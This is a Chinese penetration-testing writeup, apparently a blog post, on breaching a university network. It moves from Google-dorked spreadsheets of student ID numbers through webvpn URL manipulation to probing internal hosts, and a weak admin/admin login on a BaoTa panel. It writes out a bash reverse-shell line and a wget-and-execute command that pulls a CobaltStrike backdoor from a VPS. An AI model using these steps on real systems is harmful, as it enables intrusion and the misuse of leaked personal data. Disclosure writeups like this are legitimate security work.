【漏洞实战】从信息泄露到内网滲透
前言
能完成这次渗透纯属是信息收集做到位了。很多其实都是分散的信息,在某一次关键点集合起来就有可能拿到权限。这个漏洞已提交补天并修复完成了。
信息收集
一、发现敏感信息
此次使用的方法:
- Google Hack
- Github Hack(没有收获)
- 前端信息泄露
- ARL 灯塔资产收集(子域名、IP、端口服务、文件泄露)
通过使用 filetype:xls site:xxx.edu.cn 身份 去搜索发现了不少带身份证表字段的表,但是是否真的有敏感信息还要一个个去下载审查。
发现一个标题为名单,我猜测肯定有信息,下载后打开。
二、发现入口点
【→所有资源关注我,私信回复“资料”获取←】
1、网络安全学习路线
2、电子书籍(白帽子)
3、安全大厂内部视频
4、100份src文档
5、常见安全面试题
6、ctf大赛经典题目解析
7、全套工具包
8、应急响应笔记
在 ARL 资产列表中有一个 webvpn,我心想这不就是内网入口吗?
发现需要身份证和学号登陆,这些都可以从刚才那张表拿到。随便挑一个登陆。
发现只有一个应用能够点击,直接访问后观察 URl 发现是有规律的。
三、vpn 分配
http://xxx-xxx-edu-cn-s.xxx.xxx.edu.cn:8118/
结构应当是这样的
http://[访问地址].xxx.xxx.edu.cn:8118
可以变化的是访问地址,那么为了验证我的猜想,直接返回系统界面。
将这个地址改变成:2021-ip138-com 去做个拼接
发现完全可行。
四、前端信息泄露
在抓包 www.xxx.edu.cn 官网的时候我发现了一处内网地址
五、尝试访问
10.30.252.33,我再次拼接。
访问失败了,但是我猜测这个应当是提供校园网站服务器主机的网段。尝试修改 C段访问。
当我访问到 10.30.252.23 的时候发现是能够正常访问的,也就是说可以进行内网探测,但是似乎没发指定端口和 https 访问。没有头绪,只能 Google 看看有没有其他地址记录的先例。
site:xxx.xxx.edu.cn:8118
发现一处地址 http://xxx-xxx-edu-cn-8090-p-s.xxx.xxx.edu.cn:8118/surveydetail.aspx?pid=5&cid=397
原来我们直接使用 -8080-p 即可指定端口,而 -s 则是指定 https 访问。
如此一来我们可以进行手工内网探测了。
内网 shell
在进过一番测试后,找到了一个宝塔地址。
直接上手弱口令
账号 | 密码 |
---|---|
admin | admin |
成功进入后,去任务计划
反弹shell 安排上 bash -i >& /dev/tcp/IP/PORT 0>&1
上去之后再下载 VPS 上的 CobaltStrike (Cross2插件) Linux 后门
wget http://IP:PORT/SHELLCODE && chmod +x SHELLCODE && ./SHELLCODE
服务器成功上线。
总结
渗透最为重要的一环也是渗透的起点,那就是对于目标的信息收集。一些毫不起眼的数据往往能达到突破的作用,这整一套下来不是偶然而是必然。
【漏洞实战】从信息泄露到内网滲透相关推荐
- 如何获得cnvd原创漏洞证书之信息泄露篇(结尾福利)
一.前言 做任何事情,付出就要有回报,这样才会有动力.而对于挖漏洞这件事情,回报其实就是获得证书和奖金了.今天我就来讲讲如何获得证书.发现很多师傅对cnvd证书的挖掘缺乏思路,明明已经学了很多知识,但 ...
- 【转】挖洞实战之信息泄露与前端加密
原文链接:挖洞实战之信息泄露与前端加密 - FreeBuf网络安全行业门户 前言 本文并非密码向,不会对算法过程/代码逻辑进行具体阐述,因为这没有意义,实战的时候肯定是具体问题具体分析,所以了解个大致 ...
- 迅雷的xss漏洞和敏感信息泄露
漏洞详情 披露状态: 2010-07-23: 细节已通知厂商并且等待厂商处理中 1970-01-01: 厂商已经确认,细节仅向厂商公开 1970-01-11: 细节向核心白帽子及相关领域专家公开 19 ...
- 网安入门须知:注释的危害居然这么大?——注释漏洞导致的信息泄露
隔壁大娘收到了一条匿名短信,里面记录了大娘跟隔壁老王的开房记录,并勒索二百五十块巨款.大娘略加思索后,便提着刀冲到狗剩家门口,一刀砍在门口的卷帘门上 隔壁大娘:狗剩,你给我出来!!! 注释导致的信息泄 ...
- 实战敏感信息泄露高危漏洞挖掘利用
信息泄露介绍: 信息泄露就是某网站某公司对敏感数据没有安全的保护,导致泄露敏感被攻击者利用,例如泄露:账号,密码,管理员,身份证,数据库,服务器,敏感路径等等 信息泄露危害: 如果进了业务系统可以SQ ...
- 2022-10-15(Linux应急响应、配置漏洞之DNS域传送、内网渗透之内网主机发现技巧)
http://noahblog.360.cn/advanced-windows-taskscheduler-playbook/@[toc] [重要]拜读的文章链接都在标题上. 一.linux应急响应 ...
- 挖洞实战之信息泄露与前端加密
前言 本文并非密码向,不会对算法过程/代码逻辑进行具体阐述,因为这没有意义,实战的时候肯定是具体问题具体分析,所以了解个大致流程就行. 在挖洞过程中,很容易找到一些登录/忘记密码是手机验证码验证的站, ...
- 网络靶场实战-记一次大型内网渗透实践 【完结篇】
本场景是基于"火天网境攻防演训靶场"进行搭建,通过靶场内置的演训导调.演训裁判以及演训运维功能,可以对整个攻防演练过程进行管控和详尽的评估与复盘. 1.场景回顾 上回书说到通过一系 ...
- 网络靶场实战-记一次大型内网渗透实践 【一】
本场景是基于"火天网境攻防演训靶场"进行搭建,通过靶场内置的演训导调.演训裁判以及演训运维功能,可以对整个攻防演练过程进行管控和详尽的评估与复盘. 1.场景准备 · 场景名称 某大 ...
最新文章
- first day
- BeanCreationException: Error creating bean with name 'dataSource' defined in class path resource [
- PMWiki安装教程
- Python基础教程:赋值语句和布尔值
- Spring MVC和Struts2
- Angular应用启动时创建的injection token一览
- spring el表达式 if else_Spring 获取单例流程(二)
- Android的Dalvik虚拟机的一个小BUG
- GAN 的渐进式训练方法 PI-REC:手绘草稿迅速重建为完整图像...
- 多线多IP的服务器配置
- html字体加载太慢,字体加载CSS @font-face性能优化的常用策略
- 算法动画图解(安卓)、排序算法的可视化
- iTunes C# Mobile Device API代码-立哥开发
- 日志易产品使用系列二:使用日志易 SaaS 版本完成一次 JSON 日志分析
- 下载各版本cuda,下载以前版本的cuda
- C语言使用文件指针时遇到的位置问题
- 科技爱好者周刊(第 194 期):悲观者正确,乐观者成功
- Win10卸载 人脉
- golang iris web项目热重启
- 小型商城全新简洁风格全新UI H5移动端购物商城系统源码
热门文章
- 成功解决AttributeError: ‘Series‘ object has no attribute ‘columns‘
- ML之xgboost:利用xgboost算法(sklearn+3Split+调参曲线+EarlyStop)训练mushroom蘑菇数据集(22+1,6513+1611)来预测蘑菇是否毒性(二分类预测)
- Python3.x 发送邮件
- MongoDB数据库--扩展Base64,算法
- vue组件间的传值方式及方法调用汇总
- codeforces 480B B. Long Jumps(贪心)
- 微信公众平台--3.普通消息交互(发送与接收)
- 解决2003不支持FLV的方法
- dos窗口输入 pip 显示不是内部或外部命令
- CentOS7关闭防火墙和SELinux